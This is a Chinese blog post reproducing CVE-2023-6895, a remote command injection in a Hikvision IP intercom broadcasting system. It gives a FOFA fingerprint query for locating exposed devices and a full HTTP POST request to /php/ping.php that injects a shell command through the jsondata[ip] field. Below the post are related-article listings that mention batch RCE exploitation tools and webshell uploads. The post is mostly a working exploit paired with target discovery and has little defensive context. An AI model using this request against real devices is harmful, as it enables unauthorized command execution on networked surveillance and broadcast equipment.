海康威视__RCE漏洞_CVE-2023-6895 漏洞复现

已于 2024-01-13 10:16:44 修改
阅读量1k 收藏 6
点赞数 11
文章标签: 网络安全
于 2024-01-13 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64366018/article/details/135556961
版权

1.fofa语句

Fofa:icon_hash="-1830859634"

2.复现过程

2.1页面展示

2.2exp

POST /php/ping.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
If-Modified-Since: Thu, 08 Apr 2021 04:02:49 GMT
If-None-Match: "606e8069-2015"
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
​
jsondata%5Btype%5D=99&jsondata%5Bip%5D=whoami

******************************************************************************************

喜欢就点点收藏和关注,如何多人喜欢的话,我尽量日更最新漏洞的复现!!

******************************************************************************************
 

柯达_
关注
  • 11
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2023-6895海康威视对讲广播系统远程命令执行漏洞复现 [附POC]
薛定谔嘚喵博客
12-22 681
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895 附POC软件
nnn2188185的博客
12-27 816
Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895 附POC软件
HiKVISION 综合安防管理平台 env信息泄漏漏洞(2),2024年最新【金三银四】
2301_76223496的博客
04-15 490
可以走的很快,但一群人才能走的更远!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。影响资产数量:3,451。
海康摄像头CVE-2021-36260漏洞复现
qq_50854662的博客
01-09 7520
海康摄像头CVE-2021-36260漏洞复现
【护网必备】海康威视RCE批量检测利用工具
最新发布
Fly_鹏程万里
06-01 553
海康威视RCE漏洞批量检测和利用工具目前支持任意读取类漏洞一键利用、支持上传类漏洞一键上传哥斯拉shell等、支持配置文件加解密等。2、综合安防管理平台 iSecure Center /api/external/report任意文件上传。3、综合安防管理平台 iSecure Center /center/api/files任意文件上传。1、综合安防管理平台iSecure Center /Im/api/files任意文件读取。5、综合安防管理平台iVMS-8700/upload任意文件上传。
漏洞情报-世邦IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895
qq_52612931的博客
01-09 1087
海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE(HIK)中发现了漏洞。它被宣布为危急状态。此漏洞影响文件/php/ping. php的未知代码。使用输入netstat -ano操作参数jsondata[ip]会导致os命令注入。升级到4.1.0版本可以解决这个问题。建议升级受影响的组件。
NetMizer日志管理系统position,2024年最新2024最新腾讯网络安全面试分享
2401_83973995的博客
04-16 308
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 4300
海康威视越权访问CVE-2021-7921漏洞复现
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-...CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
SDK.rar_Hikvision_SDK_SDK hikvision_海康威视_海康威视 sdk
09-24
海康威视SDK是针对其安防产品,如摄像头和NVR等设备的开发工具包,主要为开发者提供了集成海康威视设备功能的接口和示例代码。SDK(Software Development Kit)是软件开发者用于构建应用的集合,通常包括库文件、...
CVE-2023-6895复现及IDS中snort拦截
2401_82670286的博客
02-02 621
CVE-2023-6895复现及IDS中snort拦截
漏洞复现CVE-2023-6895 IP网络对讲广播系统远程命令执行
失心少年
12-20 1037
问题在systemopr(),当jsondata[type]和jsondata[ip]存在值时,进入systemopr(),jsondata[ip]直接被代入命令执行exec()中,但是当jsondata[type]不为“0”或“1”时,不用考虑闭合参数,jsondata[ip]被直接当作命令执行。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
NUUO网络摄像头(NVR)RCE漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-03 558
NUUO Network Video Recorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。NUUO NVR视频存储管理设备的__debugging_center_utils___.php文件存在未授权远程命令执行漏洞,攻击者可在没有任何权限的情况下通过log参数执行任意命令。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
网络摄像头 登录绕过 RCE漏洞 数据分析报告
whatday的专栏
09-01 2294
目录 1. 事件概述 2. 漏洞分析 2.1 目标设备的相关信息 2.2 登录绕过漏洞 2.3 Web 服务基于缓冲区溢出的远程代码执行漏洞(无需认证) 2.4 RTSP 服务基于缓冲区溢出的远程代码执行漏洞(无需认证) 3. 漏洞影响范围 4. 漏洞修复建议 4.1 对用户的修复建议 4.2 对厂商的修复建议 5. 总结 6. 相关链接 1. 事件概述 深圳市丽欧电子有限公司(NEO Coolcam,以下简称酷视)[1],是一家集网络数码产品研发、生产、营销于一体的高新技术企
近20万WiFi监控摄像头存在远程代码执行漏洞,可随意组建僵尸网络
weixin_33754065的博客
09-20 1162
本文讲的是近20万WiFi监控摄像头存在远程代码执行漏洞,可随意组建僵尸网络, Pierre Kim通过Full Disclosure发布的安全公告披露,影响18.5万Wi-Fi监控摄像头的安全漏洞暴露在网上,随时会被黑客和诈骗者利用。 设备主要受到以下漏洞影响: 后门账户 RSA密钥和认证 GoAheadhttp服务器内预授权信息泄漏(凭证) 认证...
漏洞复现】Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)
做自己喜欢的事,并将其发挥到极致!
01-19 1094
Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
ak和sk怎么认证 海康威视_aksk鉴权
06-09
海康威视的ak和sk是用于API鉴权的,用于保证API请求的安全性。具体的认证流程如下: 1. 在海康威视开发者平台注册账号,创建应用并获取对应的ak和sk。 2. 构造请求,将ak和请求参数组合成一个字符串,然后使用sk对该字符串进行HMAC-SHA256加密,得到一个签名字符串。 3. 将签名字符串添加到请求头中,请求海康威视API。 4. 服务器接收到请求后,会从请求头中获取签名字符串和ak,然后使用该ak在后台获取对应的sk,并且使用该sk对请求参数进行HMAC-SHA256加密,得到一个签名字符串。 5. 服务器将该签名字符串和请求头中的签名字符串进行比对,如果一致,则认为请求合法,返回API响应结果;否则认为请求不合法,返回错误响应。 需要注意的是,ak和sk是非常重要的信息,开发者应该妥善保管,避免泄露。在Python中,可以使用hmac库实现海康威视ak和sk的HMAC-SHA256摘要认证。具体的代码如下: ```python import hmac import hashlib ak = "your ak" # 填写你的ak sk = "your sk" # 填写你的sk params = "your params" # 填写你的请求参数,注意需要按照字典序排序并且进行urlencode编码 message = ak + params digest = hmac.new(sk.encode(), message.encode(), hashlib.sha256).hexdigest().upper() # 将digest添加到请求头中,然后发起API请求即可 ``` 其中,ak和sk是你在海康威视开发者平台获取的认证信息,params是你的请求参数。需要注意的是,params需要按照字典序排序,并且进行urlencode编码,否则认证会失败。最后将digest添加到请求头中,然后发起API请求即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值